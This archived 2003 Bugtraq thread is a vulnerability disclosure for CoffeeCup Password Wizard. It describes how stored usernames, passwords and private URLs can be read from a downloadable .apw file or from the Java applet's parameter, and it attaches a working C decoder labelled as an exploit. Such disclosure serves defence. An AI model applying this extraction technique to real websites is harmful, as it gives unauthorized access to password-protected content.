[29130] in bugtraq
Re: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All Versions
daemon@ATHENA.MIT.EDU (Per-Ola Kristiansson)
Mon Mar 3 13:55:23 2003
Message-ID: <007701c2e119$1795cb00$3137fea9@ll>
From: "Per-Ola Kristiansson" <admin@swesign.com>
To: <bugtraq@securityfocus.com>
Date: Mon, 3 Mar 2003 01:08:59 +0100
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0074_01C2E121.786D6200"
------=_NextPart_000_0074_01C2E121.786D6200
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
The Java version is also vulnerable. The username, password and secret url
can be extracted from the param "0" in the html code. I wrote a small
program for this purpose a couple of months ago.
Password Wizard java sample: http://www.coffeecup.com/java-password/samples/
<applet code="joylock.class" width=342 height=140>
<param name="GENERATOR" value="CREATED WITH THE APPLET PASSWORD WIZARD
WWW.COFFEECUP.COM">
<param name="GENERAL"
value="1|11|004080|FFFFFF|wslzebajkcnrvogpquftxhidmyvttp://aaa.jnsseejrp.jny
/ywxxce.vtyc| |Login Complete.|Enter the Username and Password.| | |">
<param name="0"
value="6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe
/enyyvw.zcev">
</applet>
Best regards,
Per-Ola Kristiansson
----- Original Message -----
From: "Rynho Zeros Web" <hackargentino@gmx.net>
To: <bugtraq@securityfocus.com>
Sent: Saturday, March 01, 2003 12:42 AM
Subject: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
Versions
> + Topic: Easy obtaining User+Pass+More on CoffeeCup Password Wizard All
> Versions
>
> + Product: CoffeeCup Password Wizard All Versions
>
> + Vendor: CoffeeCup Software, Inc.
>
> + Site: http://www.coffeecup.com/java-password/
>
> + About CoffeeCup Password Wizard: Create unlimited password protected
pages
>
> with unlimited usernames and passwords with CoffeeCup Password Wizard.
> You don't even have to know Flash, Java, or HTML ! Customize the look and
> feel to match your page. You can even point different users to different
> URLs ! Preview within the program or your favorite browser. It's all that
> easy ! All this and more make CoffeeCup Password Wizard the easiest way
> to password protect your pages ! (¿?)
>
> + Description: Easy obtaining of names of users, passwords and a URL
> of direct access to the preferences of the same one.
>
> + Exploit:
>
> go to the login panel, see sourcecode HTML in search of the location
> of the file .swf used to make login.
>
> Example:
>
> Go to
> https://www.victim.com/billing/
>
> See sourcecode,
>
> [...]
> ID=billing WIDTH=146 HEIGHT=125>
> <PARAM NAME=movie VALUE="billing.swf">
> <PARAM NAME=quality VALUE=high>
> [...]
>
> (https://www.victim.com/billing/billing.swf)
>
> the file of the passwords is called just as the file of login, but with
> the extension .apw
>
> now, go to & download the file:
> https://www.victim.com/billing/billing.apw (APW Is The COFFEECUP Password
> Wizard File)
>
> by I complete it opens east file with any text editor and found all the
> users
> with its passwords and the URL of direct access to its options.
>
> Example of passwords file:
>
> --------- billing.apw -----------
>
> COFFEECUP PASSWORD WIZARD FILE
> WWW.COFFEECUP.COM
> PLEASE DO NOT EDIT!!!!
>
> MOVIE WIDTH:120
> MOVIE HEIGHT:100
> MOVIE FRAME RATE:0
> MOVIE BK COLOR:$00ECECEC
> MOVIE DEFAULT URL:
> MOVIE DEFAULT FRAME:
> MOVIE SWF NAME:billing.swf
> MOVIE SWF PATH:C:\Documents and Settings\vhost\Mis documentos\Mis
> Webs\victim.com\new website project\billing\
> MOVIE FONT NAME:MS Sans Serif
> MOVIE FONT SIZE:8
> MOVIE FONT COLOR:clBlack
> MOVIE TRANSPARENT TRUE
> MOVIE VERTICAL TRUE
>
> USER BOX LEFT:2
> USER BOX TOP:1
> USER BOX WIDTH:116
> USER BOX HEIGHT:34
> USER BOX CAPTION:Username
>
> PASS BOX LEFT:2
> PASS BOX TOP:36
> PASS BOX WIDTH:116
> PASS BOX HEIGHT:34
> PASS BOX CAPTION:Password
>
> BUTTON LEFT:15
> BUTTON TOP:78
> BUTTON WIDTH:90
> BUTTON HEIGHT:20
> BUTTON PATH:
> BUTTON TX:1
> BUTTON TY:1
>
> ADD USER:0anyweb xnet0305 https://www.victim.com/billing/anyweb0001.htm
> ADD USER:0anysite xnet2904 https://www.victim.com/billing/anysite0002.htm
> [...]
> END
>
> --------- billing.apw -----------
>
> Example of user & pass on billing:
>
> user: anyweb
> pass: xnet0305
> url option panel: https://www.victim.com/billing/anyweb0001.htm
>
>
> ----------------------------------------------------------------
>
> [EOF]
>
> -----------------------------------------------
> Credits: ToOcOoL (http://www.valenciahack.com/)
> -----------------------------------------------
>
> --------------------------------
> Note: sorry by my bad english ;)
> --------------------------------
>
> --
> XyBØrG
> WebMaster de:
> www.RZWEB.com.ar
> Powered By Dattatec.Com
>
> +++ GMX - Mail, Messaging & more http://www.gmx.net +++
> Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
>
------=_NextPart_000_0074_01C2E121.786D6200
Content-Type: application/octet-stream;
name="passwiz.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="passwiz.c"
// Exploit for Coffee Cup Password Wizard=20
// By THR (admin@swesign.com)
#include <stdio.h>
#include <stdlib.h>
int main(void) {
char *passwd, *uname, *url, *target;
char param[] =3D =
"6|4|36|0|cftzmapuxnrsjibgwykqvleodhlfegvwcwlczccg://qqq.axbbwwahg.axe/en=
yyvw.zcev";=20
char enc[1024];
char dec[1024];
char tmp[5];
int size[3];
int a=3D0,x=3D0,y=3D0,z=3D0;
while(param[x]) {
if(y<=3D3) {
if(param[x]=3D=3D'|') {
tmp[a]=3D0;
a=3D0;
size[y]=3Datoi(tmp);
y++;
} else {
tmp[a]=3Dparam[x];
a++;
}
} else {
enc[z]=3Dparam[x];
z++;
}
x++;
}
enc[z]=3D0;
x=3D0;
while(enc[x]) {
if(enc[x]>=3D65 && enc[x]<=3D90)
dec[x]=3Denc[enc[x]-39];
else
if(enc[x]>=3D97 && enc[x]<=3D122)
dec[x]=3Denc[enc[x]-97];
else
dec[x]=3Denc[x];
x++;
}
dec[x]=3D0;
if (!(uname =3D (char*) malloc((size[0]+1) * sizeof(char))) ||
!(passwd =3D (char*) malloc((size[1]+1) * sizeof(char))) ||
!(url =3D (char*) malloc((size[2]+1) * sizeof(char))) ||
!(target =3D (char*) malloc((size[3]+1) * sizeof(char)))) {
printf("Memory error\n");
return(1);
}
y=3D0;
z=3D26;
for(x=3Dz,y=3D0;x<size[0]+z;x++,y++)
uname[y]=3Ddec[x];
uname[y]=3D0;
z+=3Dsize[0];
for(x=3Dz,y=3D0;x<size[1]+z;x++,y++)
passwd[y]=3Ddec[x];
passwd[y]=3D0;
z+=3Dsize[1];
for(x=3Dz,y=3D0;x<size[2]+z;x++,y++)
url[y]=3Ddec[x];
url[y]=3D0;
z+=3Dsize[2];
for(x=3Dz,y=3D0;x<size[3]+z;x++,y++)
target[y]=3Ddec[x];
target[y]=3D0;
printf ("User: \t\t%s\nPassword: \t%s\nLink: \t\t%s\nTarget: =
\t%s\n",uname, passwd, url, target);=20
free (passwd);
free (uname);
free (url);
free (target);
return(0);
}
------=_NextPart_000_0074_01C2E121.786D6200--
